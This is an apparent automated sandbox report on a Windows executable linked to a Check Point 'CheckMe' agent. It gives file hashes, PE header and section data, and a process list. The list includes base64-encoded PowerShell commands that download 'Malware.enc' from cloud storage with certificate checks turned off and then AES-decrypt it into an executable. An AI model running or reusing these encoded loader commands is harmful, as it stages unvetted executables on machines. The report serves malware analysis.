File name: | cpcheckme_Y0p3xqew.exe |
Full analysis: | https://app.any.run/tasks/4b510639-e041-419d-8ac2-16906b425cdf |
Verdict: | Malicious activity |
Analysis date: | May 20, 2019, 21:19:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | 48980DA8368191161EBBA4189C32E22F |
SHA1: | F2F75928F40CE9CDC44B8E3FB01A0533B6784876 |
SHA256: | 39DC3C1AD97563442D53D62FB4CF97FC5C684A58098ECBB8617811A8760C7E0A |
SSDEEP: | 24576:wyUIhgsAvqgbWk3BRv9lo71WqakVggf6ZNflJQnhGUl5Gzy9Koj6V83+5g7itUvn:FUIVAiQW+BRlle9VggiZN9JQncu5Gzyb |
.exe | | | InstallShield setup (36.8) |
---|---|---|
.exe | | | Win32 Executable MS Visual C++ (generic) (26.6) |
.exe | | | Win64 Executable (generic) (23.6) |
.dll | | | Win32 Dynamic Link Library (generic) (5.6) |
.exe | | | Win32 Executable (generic) (3.8) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 6 |
ImageVersion: | - |
OSVersion: | 6 |
EntryPoint: | 0x5139 |
UninitializedDataSize: | - |
InitializedDataSize: | 1392640 |
CodeSize: | 65024 |
LinkerVersion: | 12 |
PEType: | PE32 |
TimeStamp: | 2018:04:02 18:06:34+02:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 02-Apr-2018 16:06:34 |
Detected languages: |
|
Debug artifacts: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x000000F8 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 5 |
Time date stamp: | 02-Apr-2018 16:06:34 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x0000FCCB | 0x0000FE00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.64783 |
.rdata | 0x00011000 | 0x00006DA2 | 0x00006E00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.74157 |
.data | 0x00018000 | 0x00003380 | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.73132 |
.rsrc | 0x0001C000 | 0x00148808 | 0x00148A00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.58439 |
.reloc | 0x00165000 | 0x00001314 | 0x00001400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.39281 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.91161 | 381 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 2.14675 | 2216 | UNKNOWN | English - United States | RT_ICON |
3 | 2.93257 | 744 | UNKNOWN | English - United States | RT_ICON |
4 | 2.14675 | 2216 | UNKNOWN | English - United States | RT_ICON |
107 | 2.37447 | 34 | UNKNOWN | English - United States | RT_GROUP_ICON |
108 | 2.49212 | 34 | UNKNOWN | English - United States | RT_GROUP_ICON |
130 | 7.59743 | 1338648 | UNKNOWN | English - United States | BINARY |
KERNEL32.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3032 | "C:\Users\admin\AppData\Local\Temp\cpcheckme_Y0p3xqew.exe" | C:\Users\admin\AppData\Local\Temp\cpcheckme_Y0p3xqew.exe | explorer.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3420 | "C:\temp\CP_Agent\cpchmelsagent_Y0p3xqew.exe" | C:\temp\CP_Agent\cpchmelsagent_Y0p3xqew.exe | cpcheckme_Y0p3xqew.exe | |
User: admin Company: Check Point Integrity Level: MEDIUM Description: CheckMeAgent Exit code: 0 Version: 1.0.0.0 | ||||
3316 | PowerShell.exe -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAVwByAGkAdABlAEwAbwBnACgAWwBzAHQAcgBpAG4AZwBdACQAZABhAHQAYQApAAoAewAKACAAIAAgACAAJABEAGEAdABlAEYAbwByAG0AYQB0ACAAPQAgACIAZABkAE0ATQB5AHkALQBIAEgAbQBtAHMAcwAuAGYAZgBmACIACgAgACAAIAAgACQAbABvAGcARgBpAGwAZQAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXABDAFAAXABDAG0AUwBjAHIAaQBwAHQATABvAGcALgBsAG8AZwAiAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHQAaQBtAGUAUwB0AHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAYQB0AGUAVABpAG0AZQBdADoAOgBOAG8AdwAuAFQAbwBTAHQAcgBpAG4AZwAoACQARABhAHQAZQBGAG8AcgBtAGEAdAApAAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AEEAcABwAGUAbgBkAEEAbABsAFQAZQB4AHQAKAAkAGwAbwBnAEYAaQBsAGUALAAgACQAdABpAG0AZQBTAHQAcgAgACsAIAAiACAALQAgACIAIAArACAAJABkAGEAdABhACAAKwAgACIAYABuACIAKQAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAgACAAIAAgAHsACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABSAGUAcwBwAG8AbgBzAGUAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAkAHIAZQBxAHUAZQBzAHQAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAHIAZQBxAHUAZQBzAHQALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAIAAgACAAIAAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAZQAuAFMAdABhAHQAdQBzACAALQBlAHEAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBTAHQAYQB0AHUAcwBdADoAOgBQAHIAbwB0AG8AYwBvAGwARQByAHIAbwByACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGUALgBSAGUAcwBwAG8AbgBzAGUAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIARwBlAHQAUgBlAHMAcABvAG4AcwBlACAAdQBuAGUAeABwAGUAdABlAGQAIABlAHgAYwBlAHAAdABpAG8AbgAiAAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwA7AAoAIAAgACAAIAB9AAoAfQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAQwBvAHAAeQBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACkACgB7AAoAIAAgACAAIAAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAgACAAIAAgAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAgACAAIAAgACAAIAAgACAAdwBoAGkAbABlACAAKAAkAGIAeQB0AGUAcwBSAGUAYQBkACAALQBuAGUAIAAwACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQATwB1AHQAcAB1AHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUATABvAGcAIAAiAEMAbwBwAHkAUwB0AHIAZQBhAG0AIAB1AG4AZQB4AHAAZQB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACIACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABSAGUAYQBkAFIAZQBzAHAAbwBuAHMAZQAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACQAUgBlAHEAdQBlAHMAdAAsACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAF0AJABPAHUAdABwAHUAdAApAAoAewAKACAAIAAgACAAdAByAHkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGgAdAB0AHAAUgBlAHMAcABvAG4AcwBlACAAPQAgAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAgACQAcgBlAHEAdQBlAHMAdAAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIAAkAGgAdAB0AHAAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACAAIAAgACAAIAAgACAAIABDAG8AcAB5AFMAdAByAGUAYQBtACAAJABpAG4AcAB1AHQAIAAkAE8AdQB0AHAAdQB0AAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABlAC4AUwB0AGEAdAB1AHMACgAgACAAIAAgAH0ACgAgACAAIAAgAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAIAB1AG4AZQB4AHAAZQB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACIACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAA2ADYANgAKACAAIAAgACAAfQAKACAACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAMAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AFAAcgBvAHgAeQAoAFsAcwB0AHIAaQBuAGcAXQAgACQAVQByAGwAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBVAHIAaQBbAF0AXQAkAHUAcgBpAHMAIAA9ACAAQAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAJABVAHIAbAApACkACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASQBXAGUAYgBQAHIAbwB4AHkAXQAgACQAaQBQAHIAbwB4AHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAkAGkAUAByAG8AeAB5ACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHUAcgBpACAAaQBuACAAJAB1AHIAaQBzACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcAByAG8AeAB5AFUAcgBpACAAPQAgACQAaQBQAHIAbwB4AHkALgBHAGUAdABQAHIAbwB4AHkAKAAkAHUAcgBpACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABwAHIAbwB4AHkAVQByAGkAIAAtAG4AZQAgACQAdQByAGkAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABpAFAAcgBvAHgAeQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgACAAIAAgACAAfQAKAAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAfQAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwBHAGUAdAAoAFsAcwB0AHIAaQBuAGcAXQAkAFUAcgBsACwAIABbAHMAdAByAGkAbgBnAF0AJABPAHUAdABwAHUAdABGAGkAbABlACkACgB7AAoAIAAgACAAIABXAHIAaQB0AGUATABvAGcAIAAiAEQAbwBHAGUAdAAgAHMAdABhAHIAdABlAGQAIgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AJAByAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAFUAcgBsACkACgAgACAAIAAgACQAcAByAG8AeAB5ACAAPQAgAEcAZQB0AFAAcgBvAHgAeQAgACQAVQByAGwACgAgACAAIAAgAGkAZgAgACgAJABwAHIAbwB4AHkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQALgBQAHIAbwB4AHkAIAA9ACAAJABwAHIAbwB4AHkACgAgACAAIAAgAH0ACgAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAuAE0AZQB0AGgAbwBkACAAPQAgACIARwBFAFQAIgAKAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAgACAAIAAgAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBFAHIAcgBvAHIAOgAgAG8AdQB0AHAAdQB0ACAAZgBpAGwAZQAgAG4AbwB0ACAAYwByAGUAYQB0AGUAZAAiAAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAgACAAIAAgAH0ACgAKACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBSAGUAYQBkAGkAbgBnACAAcgBlAHMAcABvAG4AcwBlACIACgAgACAAIAAgACQAcwB0AGEAdAB1AHMAIAA9ACAAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAIAAkAHIAZQBxAHUAZQBzAHQAIAAkAG8AdQB0AHAAdQB0AAoAIAAgACAAIAAkAG8AdQB0AHAAdQB0AC4ARgBsAHUAcwBoACgAKQAKACAAIAAgACAAJABvAHUAdABwAHUAdAAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIARABvAEcAZQB0ACAAZABvAG4AZQAiAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAcwB0AGEAdAB1AHMACgB9AAoACgAkAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAyAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvAGMAcABjAGgAZQBjAGsAbQBlAGYAaQBsAGUAcwAvAGYAaQBsAGUAcwAvAE0AYQBsAHcAYQByAGUALgBlAG4AYwAiAAoAJABvAHUAdABGAGkAbABlACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAFQAZQBtAHAAXwBDAFAAXwBBAE0ALgBlAHgAZQAiAAoACgBXAHIAaQB0AGUATABvAGcAIAAiAEQAbwB3AG4AbABvAGEAZAAgAHMAdABhAHIAdABlAGQAIgAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBbAGkAbgB0AF0AJAByAGUAcwAgAD0AIABEAG8ARwBlAHQAIAAkAHUAcgBsACAAJABvAHUAdABGAGkAbABlAAoAVwByAGkAdABlAEwAbwBnACAAIgBEAG8AdwBuAGwAbwBhAGQAIABlAG4AZAAiAAoAZQB4AGkAdAAgACQAcgBlAHMA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4048 | PowerShell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ACIAKQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACkACgB7AAoACQAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAJACQAYwBzAEUAbgBjAHIAeQBwAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwByAHkAcAB0AG8AUwB0AHIAZQBhAG0AIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAFAAcgBvAGMAZQBzAHMAbwByACwAIAAiAFcAcgBpAHQAZQAiAAoACQAKAAkAaQBmACAAKAAhACQAYwBzAEUAbgBjAHIAeQBwAHQAKQAKAAkAewAKAAkACQB0AGgAcgBvAHcAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBOAG8AdABGAG8AdQBuAGQARQB4AGMAZQBwAHQAaQBvAG4AXQAgACIARgBhAGkAbABlAGQAIAB0AG8AIABjAHIAZQBhAHQAZQAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtAC4AIgAgAAoACQB9AAoACgAJAHQAcgB5AAoACQB7AAoACQAJACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKAAoACQAJAHcAaABpAGwAZQAgACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAC0AbgBlACAAMAApAAoACQAJAHsACgAJAAkACQAkAGMAcwBFAG4AYwByAHkAcAB0AC4AVwByAGkAdABlACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsACgAJAAkACQAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAJAAkAfQAKAAkAfQAKAAkAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAJAHsACgAJAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgACQAUAByAG8AYwBlAHMAcwBvAHIAKQAKAHsACgAJACQAaQBuAHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAiAE8AcABlAG4AIgAsACAAIgBSAGUAYQBkACIACgAJAGkAZgAgACgAIQAkAGkAbgBwAHUAdAAgAC0AbwByACAAKAAkAGkAbgBwAHUAdAAgAC0AaQBzAG4AbwB0ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AXQApACkACgAJAHsACgAJAAkAdABoAHIAbwB3ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUATgBvAHQARgBvAHUAbgBkAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAiACQASQBuAHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAuACIAIAAKAAkAfQAKAAoACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAJAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACAALQBvAHIAIAAoACQAbwB1AHQAcAB1AHQAIAAtAGkAcwBuAG8AdAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AKQApAAoACQB7AAoACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAJAH0ACgAKACAAIAAgACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACAAJABvAHUAdABwAHUAdAAgACQAUAByAG8AYwBlAHMAcwBvAHIACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABEAGUAYwByAHkAcAB0AEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AJABBAGUAcwApAAoAewAKAAkAJABkAGUAYwByAHkAcAB0AG8AcgAgAD0AIAAkAEEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAIAAkAEkAbgBwAHUAdABGAGkAbABlACAAJABPAHUAdABwAHUAdABGAGkAbABlACAAJABkAGUAYwByAHkAcAB0AG8AcgAgACQAZAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEMAcgBlAGEAdABlAEEAZQBzACgAJABCAGEAcwBlADYANABLAGUAeQBEAGEAdABhACkACgB7AAoACQBbAGIAeQB0AGUAWwBdAF0AJABrAGUAeQBEAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEIAYQBzAGUANgA0AEsAZQB5AEQAYQB0AGEAKQAKAAkAJABtAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACwAJABrAGUAeQBEAGEAdABhACkACgAJACQAcgBlAGEAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQgBpAG4AYQByAHkAUgBlAGEAZABlAHIAIAAkAG0AcwAKACAAIAAgACAACgAJACQAYQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoACQAKACAAIAAgACAAJABzAGkAegBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEkAbgB0ADMAMgAoACkAOwAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAHIAZQBhAGQAZQB